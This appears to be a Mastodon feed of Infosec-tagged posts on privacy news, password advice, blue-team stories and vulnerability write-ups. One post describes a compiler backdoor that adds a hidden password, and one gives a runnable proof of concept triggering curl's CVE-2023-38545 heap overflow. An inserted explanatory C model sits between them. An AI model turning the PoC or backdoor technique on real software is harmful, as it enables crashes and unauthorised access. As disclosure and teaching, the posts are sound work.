Items tagged with: Infosec
ic_null - Twitch
ic_null streams live on Twitch! Check out their videos, sign up to chat, and join their community.Twitch
Mini Blue Team Diaries Story:
Was responsible for SecOps at a SaaS platform that managed lots of things for companies, including travel bookings.
We had a bunch of customers in the higher education space who used SSO to login to our app. Unfortunately, MFA within the SSO configuration was not common back then, so a compromised university account would lead to much access, including to our platform.
Suddenly, a thing we saw a lot of was higher-ed customers reporting that they were being charged for trips that just didn't make sense. These were bookings for same day travel, usually between two African cities.
After some digging around and investigation, we figured out that a threat actor would phish or purchase the user's university credentials, then, using the SSO into our environment, they'd make bookings using the travel booking feature - those bookings were made on behalf of the threat actor's customers, who actually thought they were dealing with a legit, well-connected travel agent.
We were able to advise our customers on how to stop this type of thing happening, with approval rules for bookings, and ya know, MFA, and also managed to build in some detective controls so our team could detect and shut down such bookings as soon as they came in.
What made this particularly interesting, though, was that through some OSINT we were able to determine the true identity of the actor responsible - and we connected with them on Facebook, mainly because we wanted to ask them about their methods now that we'd all but shut down their scheme.
We chatted for a bit, and got some useful intel. At the end, the actor congratulated the team on our new controls, and said they'd moved on to using another service they'd found to make their bookings.
For more, slightly less mini, Blue Team Diaries stories like this, check out infosecdiaries.com
Little high on theory but we did get to do some proper hollywood hacking. More next week! :) #selfPromo #accessibility #infoSec #cybersecurity
(IC_Null Stream) Beginning of an adventure: What's a beginner with a screenreader have to do to hack
Start of a new project. As IC_Null on Twitch, I'll be covering hacking, coding and overall tech content. The content will be archived here.Follow my new hack...YouTube
What on earth?! Amazon S3 charges you for unauthorised requests to S3?!
That's just absolutely insane! I better check my AWS account and delete any unused buckets I have in there …
medium.com/@maciej.pocwierz/ho…
#aws #s3 #infosec #webdev #cloud
How an empty S3 bucket can make your AWS bill explode
Imagine you create an empty, private AWS S3 bucket in a region of your preference. What will your AWS bill be the next morning?Maciej Pocwierz (Medium)
Tomorrow at 3 PM EST I'll do a first #stream. We'll make us a #TryHackMe account, go through the new user flow, maybe do a room or two while looking at the various #accessibility gotchas we run into. In future streams we'll do similar for HTB, HTBA etc. as well as more #programming related things but tomorrow ...we leave pallet town all mozie-like. See you all then! #twitch #infoSec #selfPromo
Personally, I'm just going to delete my account.
Ref: cash.app/legal/us/en-us/tos
#privacy #infosec #cybersecurity #arbitration #BindingArbitration #ConsumerRights
Terms of Service | Cash App
The Cash App Terms of Service govern your use of Cash App. By using Cash App you agree to be bound by these Terms, and all other terms and policies applicable to each Service.cash.app
It's also true that many #hacking tools, platforms, courses etc. could use some help in the #accessibility department. It's a neverending vicious circle.
Enter my new twitch channel, IC_null. On this channel, I will be streaming #programming and #hacking content including THM, HTB and who knows what else, from the perspective of a #screenReader user.
What I need, is an audience. If this is something you reckon you or anybody you know might be interested in, drop the channel a follow or share this post. Gimme that #infoSec Mastodon sense of camaraderie and help me out to make this idea an actual thing :) twitch.tv/ic_null #tryHackMe #streamer #selfPromo
ic_null - Twitch
ic_null streams live on Twitch! Check out their videos, sign up to chat, and join their community.Twitch
I implemented Ken Thompson’s Reflections on Trusting Trust (1984 Turing Award Lecture) compiler #backdoor for the GNU Compiler Collection (GCC). The backdoor maintains persistence by re-injecting itself to any new versions of the compiler built. The secondary payload modifies a test application by adding a backdoor password to allow authentication bypass:
$ cat testapp.c
    #include <string.h>
    #include <stdio.h>
    #include <stdlib.h>

    int main(int argc, char **argv)
    {
        /* the only legitimate password is "secret" */
        if (argc == 2 && !strcmp(argv[1], "secret"))
        {
            printf("access granted!\n");
            return EXIT_SUCCESS;
        }
        else
        {
            printf("access denied!\n");
            return EXIT_FAILURE;
        }
    }
$ gcc -Wall -O2 testapp.c -o testapp
$ ./testapp kensentme
access granted!
$
I spent most of the time (around two hours) writing the generalized tooling that produces the final quine version of the malicious payload. Now that this is done, the actual code can be adjusted trivially to exploit more target code without any need to adjust the self-reproducing section of the code. This method of exploitation could be extended to target various binaries: SSH Server, Linux Kernel, Setuid binaries and similar. While itself written in C, the secondary payloads can target any programming languages supported by GCC.
It should be noted that the GCC build checks for malicious compiler changes such as this. This check can – of course – also be bypassed. However, most serious projects have measures in place to avoid hacks of this nature.
Some links:
- Ken Thompson's "Reflections on Trusting Trust" paper: cs.cmu.edu/~rdriley/487/papers…
- David A. Wheeler: "Fully Countering Trusting Trust through Diverse Double-Compiling (DDC) - Countering Trojan Horse attacks on Compilers" dwheeler.com/trusting-trust/
#hacking #exploitdevelopment #kenthompson #infosec #cybersecurity @vegard
Fully Countering Trusting Trust through Diverse Double-Compiling (DDC) - Countering Trojan Horse attacks on Compilers
David A. Wheeler's Page on Countering 'Trusting Trust' through Diverse Double-Compiling (DDC) - Countering Trojan Horse attacks on Compilersdwheeler.com
LibreOffice supports digital signatures via GnuPG for OpenDocument Format (ODF) files.
Select: File > Digital Signatures > Digital Signatures > Sign Document > Select Certificate > Sign > Enter Password > OK > Close
A banner will appear stating the document is digitally signed.
Digital Signature: en.wikipedia.org/wiki/Digital_…
GnuPG: mastodon.online/@blueghost/111…
ODF: mastodon.online/@blueghost/111…
Website: libreoffice.org
Mastodon: @libreoffice
#LibreOffice #DigitalSignature #GnuPG #GPG #InfoSec #ODF
Blue Ghost (@blueghost@mastodon.online)
Attached: 1 image OpenDocument Format (ODF) is a standard for storing various types of data such as documents and spreadsheets, it is not software. ODF has interoperability, it is supported in open source and proprietary software.Mastodon
“96% of US Hospital Websites Share Visitor Info With Meta, Google, Data Brokers” yro.slashdot.org/story/24/04/1…
#privacy #infosec #DataBrokers
96% of US Hospital Websites Share Visitor Info With Meta, Google, Data Brokers - Slashdot
An anonymous reader quotes a report from The Guardian: Hospitals -- despite being places where people implicitly expect to have their personal details kept private -- frequently use tracking technologies on their websites to share user information wi…yro.slashdot.org
This piece is worth reading if you’re in tech criticism or infosec/cybersecurity and are being asked for commentary on IoT and smart home devices.
People aren’t foolish for using IoT or for wanting things to be easier in their homes. This tech makes positive and meaningful change for people of all kinds of abilities. It’s valid to worry about the privacy or security issues that IoT is riddled with, but don’t draw a direct line from there to blaming the user - some people have no alternatives that don’t involve giving up independent access to their own homes and lives. Everyone deserves to live in ways that fit their needs.
Instead, join the push to hold manufacturers and providers to account for poor security and privacy practices. Advocate for better, more respectful and accessible default configurations. Help people understand how to anticipate and mitigate the worst of these issues when they’re setting things up, and give them power and agency over their home systems.
We all deserve to have tech that works for us, in all the ways that matters.
#accessibility
#a11y #infosec
#cybersecurity
#iot #smarthome
theverge.com/24080201/smart-ho…
How smart home technology made my home more accessible
Using one’s phone or voice to flip a light switch may be convenient since you don’t need to get up. For the author and other disabled people, this makes it accessible.Steven Aquino (The Verge)
No more rocket science, I'm moving to Post-Quantum encryption any day now...
tuta.com/blog/post-quantum-cry…
@Tutanota
#infosec #cryptography
Post Quantum Cryptography: Why We Need Resistant Encryption NOW.
Quantum-resistant or post-quantum cryptography is our best bet against attacks from upcoming quantum computers to increase security and privacy.Tutanota
"For years, the antivirus software company harvested information from users’ web browsers without their consent." #infosec #privacy
Its clients have included Home Depot, Google, Microsoft, Pepsi, and McKinsey.
theverge.com/2024/2/22/2408013…
Avast fined $16.5 million for ‘privacy’ software that actually sold users’ browsing data
Avast, the cybersecurity software company, is facing a $16.5 million fine from the FTC after its privacy extensions and antivirus software harvested and sold user data.Emma Roth (The Verge)
im getting really tired... -w-
summary of today:
someone on a Japanese hacker forum decided it was a good idea to spam the entire Fediverse because they wanted to cancel a minor that DDoSed a Discord bot which apparently made them lose millions (what?)
A Discord bot. I can't make this shit up man.
The real culprit seems to be someone who goes by mumei in the ctkpaarr.org forums, whose first post was literally a threat to ap12, that if they don't delete their "Kuroneko Server" Discord bot, they will spam every blog, forum and SNS and cancel him.
This shit is ridiculous.
The ap12 account from mastodon-japan was actually fake, and this dude impersonated a minor to get all of the Fediverse (us) to bully him.
The forum admins didn't even stop this. Why? lulz apparently. #fediblockmeta #fediadmins #fediadmin #mastoadmin #mastoadmins #spam #cybercrime #cybersec #infosec #drama #discord
NEW: WhatsApp will soon make it possible to chat with people who use other messaging apps. It's revealed some more details on how that will work.
— Apps will need to sign an agreement with Meta, then connect to its servers.
— Meta wants people to use the Signal Protocol, but also says other encryption protocols can be used if they can meet WhatsApp's standards
— WhatsApp has been testing with Matrix in recent months, although nothing is agreed yet. Swiss app Threema says it won't become interoperable
wired.com/story/whatsapp-inter… #tech #whatsapp #dma #infosec #news #technology
WhatsApp Chats Will Soon Work With Other Encrypted Messaging Apps
New EU rules mean WhatsApp and Messenger must be interoperable with other chat apps. Here’s how that will work.Matt Burgess (WIRED)
This screenshot shows the app analytics data sent by two different #iOS apps: Duolingo and Tinder. What's the likelihood that both apps are installed on the same device? 💯? 🤯
Both apps use Unity Ads. The data in the screenshot is collected by the Unity Ads framework included in these two apps, and any app that uses Unity Ads. The data is sent to the same Unity server. As a result, Unity Ads can easily fingerprint users and track them across different apps.
#privacy #tracking #Apple #infosec
Hey #furries there's a bill in Oklahoma that was introduced & would punish children for dressing as a furry at school & have them taken away by Animal Control.
Rep. Humphrey has introduced a heap of shitty bills.😭
Bill Text: webserver1.lsb.state.ok.us/cf_…
Other details: legiscan.com/OK/bill/HB3084/20…
#tech #infosec #nerds #oklahoma
Getting security online right seems like a daunting task. But one thing is certain: Password managers help! 💪
🔥Here are our top three: tuta.com/blog/best-password-ma… 🔥
What are your favorite #PasswordManagers❓
#privacy #security #opsec #passwords #passwordfatigue #databreach #breachdata #infosec
Why Password Managers Are Important
Password managers are easy tools to increase your privacy and security online. Start using them now!Tutanota
- KeePassXC (49%, 218 votes)
- Bitwarden (46%, 201 votes)
- Pass (4%, 18 votes)
📫GREAT Reason To Both Use / Support @thunderbird #Thunderbird
New Microsoft #Outlook Collects / Shares Your Data w/Over 772 Parties
#email #communication #FOSS #Microsoft #Thunderbird #Mozilla #encryption #crypto #e2ee #infosec #Proton #surveillance #cybersecurity #privacy #News
proton.me/blog/outlook-is-micr…
Outlook is Microsoft’s new data collection service
The new Outlook now appears to be a data collection service for Microsoft’s 772 external partners for targeted advertising.Edward Komenda (Proton)
LibreOffice supports symmetric and asymmetric encryption for OpenDocument Format (ODF) files.
Select File > Save/Save As
The "Save with password" option encrypts the file with AES-256.
The "Encrypt with GPG key" option encrypts the file with a public key.
Symmetric encryption: en.wikipedia.org/wiki/Symmetri…
Asymmetric encryption: en.wikipedia.org/wiki/Public-k…
Website: libreoffice.org
Mastodon: @libreoffice
#LibreOffice #Encryption #OpenSource #OpenPGP #PGP #GnuPG #GPG #InfoSec #Privacy #Security
Home | LibreOffice - Free Office Suite - Based on OpenOffice - Compatible with Microsoft
Free office suite – the evolution of OpenOffice. Compatible with Microsoft .doc, .docx, .xls, .xlsx, .ppt, .pptx. Updated regularly, community powered.www.libreoffice.org
Fascinating and sophisticated MiTM ('man in the middle') at Hetzner (DE) and Linode, targeting Russia's largest XMPP/Jabber (civilian) chat service. The authors of the article make a reasonably compelling case that "this is lawful interception Hetzner and Linode were forced to setup."
notes.valdikss.org.ru/jabber.r…
Excellent mitigation walkthrough here:
Sure gets me thinking.
#LibreOffice posted an article titled "WE WANT TO USE OUR USERS PERSONAL DATA" at design.blog.documentfoundation…
LibreOffice was promoting a data collaboration with a company called polypoly. That article appears to contradict this post.
In the last entry in the comments section of the article the author states the project is on hold.
@libreoffice, what is the status of this project with polypoly? Is it still on hold or has it been cancelled?
#Privacy #InfoSec #TheDocumentFoundation @tdforg
Community support needed: We want to use our users personal data - LibreOffice Design Team
What comes to your mind, when you ask yourself why people use LibreOffice? A “stunning user experience” is likely not in the top list. And unfortunately we share this problem with a lot of user facing Free Software.Heiko Tietze (LibreOffice Design Team)
Why did the #curl #CVE202338545 vulnerability hide from static analysis tools?
The main reason for this is the type of code structure in question. In general, state engines are quite difficult for static analysis tools since, as the name implies, the state of the various variables depends on runtime state changes.
The code attempts to determine whether it is safe to use the provided host name for remote resolution. Since the code does not function correctly with host names longer than 255 characters, it falls back to using “socks5://” protocol (local name resolution) if the host name is longer. When the name is too long, the code forces “local name resolution” by setting “socks5_resolve_local” variable to TRUE.
Unfortunately this “socks5_resolve_local” variable isn’t stored in the “socks_state” structure as it should have been. For each state “step” the initial value for the variable is determined with:
    bool socks5_resolve_local =
        (conn->socks_proxy.proxytype == CURLPROXY_SOCKS5) ? TRUE : FALSE;
The INIT state then sets “socks5_resolve_local” to TRUE if the host name is too long:
    /* RFC1928 chapter 5 specifies max 255 chars for domain name in packet */
    if(!socks5_resolve_local && hostname_len > 255) {
        infof(data, "SOCKS5: server resolving disabled for hostnames of "
                    "length > 255 [actual len=%zu]", hostname_len);
        socks5_resolve_local = TRUE;
    }
But this check is *only* done in INIT state. When the state is anything else, the initial value is used.
Now, later CONNECT_RESOLVE_REMOTE state checks if remote name resolution should be used or not:
    if(!socks5_resolve_local) {
        if (… sx->hostname is literal IPv6 address …) {
            … use ipv6 address direct …
        }
        else if (… sx->hostname is literal IPv4 address …) {
            … use ipv4 address direct …
        }
        else {
            socksreq[len++] = 3;
            socksreq[len++] = (char) hostname_len; /* one byte address length */
            memcpy(&socksreq[len], sx->hostname, hostname_len); /* w/o NULL */
            len += hostname_len;
        }
    }
As the “socks5_resolve_local” flag is FALSE for the excessively long hostname, the “socksreq” heap buffer will be overflowed by the memcpy call.
There is no obvious way for the static analysis tools to determine that “socks5_resolve_local” might be set incorrectly for some of the states. Runtime #fuzzing will find this flaw quite easily, but unfortunately no fuzzing was performed for this specific functionality.
#vulnerability #staticanalysis #infosec
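To make the state-machine flaw described above concrete, here is an added model (not libcurl's code, and not part of the original post) of the two shapes the code can take: a "vulnerable" step function whose resolve-local flag is a local variable recomputed on every state entry, and a "fixed" step function that keeps the flag inside the state structure, as the post says it should have been. The names socks_phase, write_remote_hostname(), step_vulnerable(), step_fixed(), simulate() and the 16384-byte SOCKSREQ_SIZE are assumptions of this model; the request header offset and the all-'A' hostname are constructed. Instead of overflowing, the model reports -1 wherever the original memcpy would have written past the end of the buffer, so it can be run safely to see when each shape reaches that point.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed buffer size for this model (an assumption, not libcurl's value;
 * the real size depends on application settings as the advisory explains). */
#define SOCKSREQ_SIZE 16384

/* Two of the handshake phases named in the post. */
enum socks_phase { SOCKS_INIT, SOCKS_CONNECT_RESOLVE_REMOTE };

/* Hypothetical stand-in for the socks_state structure; the fixed variant stores
 * its resolve_local decision here so that every later phase sees it. */
struct socks_state {
    enum socks_phase state;
    bool resolve_local;
    const char *hostname;
    size_t hostname_len;
    unsigned char socksreq[SOCKSREQ_SIZE];
};

/* Emulates the CONNECT_RESOLVE_REMOTE write shown in the post. Returns the number
 * of address bytes written, 0 when the name is resolved locally (nothing copied),
 * and -1 where the original memcpy would run past the end of socksreq; the model
 * refuses to write instead of overflowing. */
static int write_remote_hostname(struct socks_state *sx, bool resolve_local)
{
    size_t len = 4; /* VER, CMD, RSV, ATYP already placed (constructed offset) */
    if (resolve_local)
        return 0;
    if (len + 2 + sx->hostname_len > sizeof(sx->socksreq))
        return -1;
    sx->socksreq[len++] = 3;                               /* ATYP = domain name */
    sx->socksreq[len++] = (unsigned char)sx->hostname_len; /* one byte: truncates > 255 */
    memcpy(&sx->socksreq[len], sx->hostname, sx->hostname_len);
    return (int)(2 + sx->hostname_len);
}

/* Vulnerable shape: the flag is a local recomputed on every step, so the
 * adjustment made in INIT is gone by the time CONNECT_RESOLVE_REMOTE runs. */
static int step_vulnerable(struct socks_state *sx, bool proxy_is_socks5)
{
    bool socks5_resolve_local = proxy_is_socks5; /* socks5h => false */
    switch (sx->state) {
    case SOCKS_INIT:
        if (!socks5_resolve_local && sx->hostname_len > 255)
            socks5_resolve_local = true;         /* only this state ever sees it */
        sx->state = SOCKS_CONNECT_RESOLVE_REMOTE;
        return 0;
    case SOCKS_CONNECT_RESOLVE_REMOTE:
        return write_remote_hostname(sx, socks5_resolve_local);
    }
    return 0;
}

/* Hardened shape: the decision is persisted in the state structure. */
static int step_fixed(struct socks_state *sx, bool proxy_is_socks5)
{
    switch (sx->state) {
    case SOCKS_INIT:
        sx->resolve_local = proxy_is_socks5;
        if (!sx->resolve_local && sx->hostname_len > 255)
            sx->resolve_local = true;            /* survives into later phases */
        sx->state = SOCKS_CONNECT_RESOLVE_REMOTE;
        return 0;
    case SOCKS_CONNECT_RESOLVE_REMOTE:
        return write_remote_hostname(sx, sx->resolve_local);
    }
    return 0;
}

/* Drives one of the two machines through INIT then CONNECT_RESOLVE_REMOTE with a
 * constructed hostname of hostname_len 'A' characters. Return value follows
 * write_remote_hostname(); -2 means the model itself ran out of memory. */
int simulate(bool fixed, size_t hostname_len, bool proxy_is_socks5)
{
    struct socks_state *sx = calloc(1, sizeof *sx);
    char *host = malloc(hostname_len + 1);
    if (!sx || !host) { free(sx); free(host); return -2; }
    memset(host, 'A', hostname_len);
    host[hostname_len] = '\0';
    sx->state = SOCKS_INIT;
    sx->hostname = host;
    sx->hostname_len = hostname_len;
    int rc = 0;
    for (int i = 0; i < 2 && rc == 0; i++)
        rc = fixed ? step_fixed(sx, proxy_is_socks5) : step_vulnerable(sx, proxy_is_socks5);
    free(host);
    free(sx);
    return rc;
}

int main(void)
{
    printf("vulnerable, socks5h, 300-char host  : %d\n", simulate(false, 300, false));
    printf("vulnerable, socks5h, 20000-char host: %d\n", simulate(false, 20000, false));
    printf("fixed, socks5h, 20000-char host     : %d\n", simulate(true, 20000, false));
    return 0;
}
```

The 300-character case shows why the bug is hard to spot statically: the vulnerable machine happily writes the name with a truncated length byte and nothing crashes, so only a name longer than the buffer reaches the memcpy overflow the post describes. The fixed machine returns 0 for both long names because the INIT decision to resolve locally is still in effect when CONNECT_RESOLVE_REMOTE runs.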
Here’s a quick proof of concept to reproduce the #curl #CVE202338545 #heapoverflow #vulnerability. This PoC expects localhost to run a #socks5 proxy:
gcc -xc -fsanitize=address - -lcurl <<EOF
#include <curl/curl.h>
#include <string.h>

int main(void)
{
    CURL *curl = curl_easy_init();
    if(curl) {
        char url[32768];
        memcpy(url, "https://", 8);
        memset(url + 8, 'A', sizeof(url) - 8 - 1);
        url[sizeof(url) - 1] = '\0';
        curl_easy_setopt(curl, CURLOPT_URL, url);
        (void)curl_easy_perform(curl);
        curl_easy_cleanup(curl);
    }
    return 0;
}
EOF
https_proxy=socks5h://127.0.0.1 ./a.out
Some comments:
• Application must use a socks5h proxy to be vulnerable (it can be via proxy env variables or by explicitly setting the proxy options inside the app).
• Application must either fetch the attacker provided URL or follow redirects controlled by the attacker.
• Exploitation is made slightly more complicated due to this being a heap buffer overflow (many libc have built-in heap sanity checks). On modern systems with address space layout randomization (ASLR) an additional information leak is likely required for successful exploitation.
• Certain combinations of libcurl, platform and/or application options are not affected. See the advisory at curl.se/docs/CVE-2023-38545.ht… for more details.
Some exciting news: Over the past few months I have been working on founding a new organization: Blodeuwedd Labs (@blodeuweddlabs)
We are now in a position to offer subsidized security assessments (and other services) for open source projects.
(In addition to a whole array of analysis, development, and custom research offerings for everyone else)
Announcement (and more info): blodeuweddlabs.com/news/open-s…
#infosec #security #appsec #canada #opensource
Launching our Open Source Review Scheme | Blodeuwedd Labs
To celebrate the founding of Blodeuwedd Labs we are excited to announce Subsidized Assessments for open source projects as part of our commitment to continually give back to the open source Community.blodeuweddlabs.com
If you're using #bitwarden, make sure to change the KDF algorithm to Argon2id[^1] which is much more robust against GPU-powered attacks compared to its counterpart.
You can play around with this little calculator to see the impact of each algorithm on cracking cost estimation: passwordbits.com/passphrase-cr…
[^1]: bitwarden.com/help/what-encryp…
Encryption | Bitwarden Help Center
Learn how Bitwarden salts and hashes password Vault data before sending it to the Cloud for secure storage.Bitwarden
BREAKING: #Google to start deleting unused #email accounts so other people can use them.
🤔 What could possibly go wrong?
🤦♂️ Techbros are (still) idiots.
blog.google/technology/safety-…
Updating our inactive account policies
Starting later this year, we are updating our inactivity policy for Google Accounts to 2 years across our products.Ruth Kricheli (Google)
This dumb password rule is from MySwissLife.
User ID *has to* be 8 characters exactly, password *has to be* 8 characters and numbers only.
dumbpasswordrules.com/sites/my…
#password #passwords #infosec #cybersecurity #dumbpasswordrules
Google has just updated its 2FA Authenticator app and added a much-needed feature: the ability to sync secrets across devices.
TL;DR: Don't turn it on.
The new update allows users to sign in with their Google Account and sync 2FA secrets across their iOS and Android devices.
We analyzed the network traffic when the app syncs the secrets, and it turns out the traffic is not end-to-end encrypted. As shown in the screenshots, this means that Google can see the secrets, likely even while they’re stored on their servers. There is no option to add a passphrase to protect the secrets, to make them accessible only by the user.
Why is this bad?
Every 2FA QR code contains a secret, or a seed, that’s used to generate the one-time codes. If someone else knows the secret, they can generate the same one-time codes and defeat 2FA protections. So, if there’s ever a data breach or if someone obtains access .... 🧵
#Privacy #Cybersecurity #InfoSec #2FA #Google #Security
This dumb password rule is from Banco Mercantil.
8 to 15 chars. No special chars allowed but requires special chars. Also
requires lowercase, uppercase, and numbers. Consecutive chars are
prohibited. Did I mention the page hangs while you type? That eye icon
tho.
dumbpasswordrules.com/sites/ba…
#password #passwords #infosec #cybersecurity #dumbpasswordrules
Banco Mercantil - Dumb Password Rules
8 to 15 chars. No special chars allowed but requires special chars. Also requires lowercase, uppercase, and numbers. Consecutive chars are prohibited. Did I mention the page hangs while you type? That eye icon tho.dumbpasswordrules.com